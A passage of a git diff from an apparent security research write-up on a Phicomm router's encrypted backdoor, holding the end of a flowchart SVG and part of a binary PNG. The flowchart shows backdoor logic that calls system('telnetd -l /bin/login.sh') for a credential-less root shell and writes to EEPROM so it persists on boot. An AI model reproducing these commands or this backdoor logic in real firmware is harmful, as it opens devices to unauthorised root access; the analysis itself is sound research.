stroke-dasharray="6.03145968"/><g transform="translate(82.846281982,1591.852996044) translate(-82.846281982,-1591.852996044)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 95.41182298199999 1585.570225544 L 82.846281982 1591.852996044 L 95.41182298199999 1598.135766544 Z"/></g></g><g><g><rect fill="white" stroke="none" x="108.228674802" y="1614.4709698440001" width="352.50692834764646" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="108.228674802" y="1629.549619044" width="221.69026126772096" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="210.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="311.2238057696465" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="379.7404759966973" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.49047218200002" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.990472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 82.846281982 1649.1518630040002 L 150.700203382 1649.1518630040002 L 150.700203382 1668.7541069640001 L 102.80036109000001 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(90.38560658200001,1668.7541069640001) translate(-90.38560658200001,-1668.7541069640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 102.951147582 1662.4713364640002 L 90.38560658200001 1668.7541069640001 L 102.951147582 1675.036877464 Z"/></g></g><g><g><rect fill="white" stroke="none" x="217.41088641052053" y="1691.3720807640002" width="237.8569268217676" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="219.67268379052052" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.3060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="380.8060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 90.38560658200001 1710.974324724 L 569.8783385528086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(582.2930930608086,1710.974324724) translate(-582.2930930608086,-1710.974324724)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 569.7275520608085 1704.6915542240001 L 582.2930930608086 1710.974324724 L 569.7275520608085 1717.257095224 Z"/></g></g><g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1733.5922985240002" width="325.9402593603723" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1748.6709477240001" width="310.85692920595335" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1763.7495969240001" width="300.40692224413084" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1778.828246124" width="289.2069214811914" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1793.906895324" width="134.62360086351563" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1808.985544524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1824.064193724" width="327.1735891333215" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1839.142842924" width="324.89025440126585" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1854.221492124" width="320.2235902777307" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1869.300141324" width="340.8402642241113" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1884.378790524" width="355.54026498705076" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1899.4574397239999" width="326.74026193529295" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="900.8432732241204" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="904.7932754175713" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="919.143275799041" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="814.626601757293" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.5432696955254" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="638.7766070978691" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="673.1932750361016" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1807.477679604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1822.556328804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="902.0766029970696" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="918.8266006128838" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="933.1766009943535" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="792.2432704584648" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="829.5766025202324" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="859.3599353449395" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="928.5099368708184" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="683.0766063349297" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="719.7599406855156" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="844.0599437372734" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="908.7432780878594" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="775.8099361078789" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="903.9099422113945" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="690.5766063349297" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.3766093866875" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 597.3717422608086 1919.0596836840002 L 657.6863390608086 1919.0596836840002 L 657.6863390608086 1938.6619276440001 L 609.7864967688085 1938.6619276440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(597.3717422608086,1938.6619276440001) translate(-597.3717422608086,-1938.6619276440001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 609.9372832608086 1932.3791571440001 L 597.3717422608086 1938.6619276440001 L 609.9372832608086 1944.944698144 Z"/></g></g></g><g/><g/></g></svg>
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png b/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
new file mode 100644
index 0000000000000000000000000000000000000000..bba653b88a06ffe761800e3e158ea2a66680b4ca
GIT binary patch
literal 535389
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
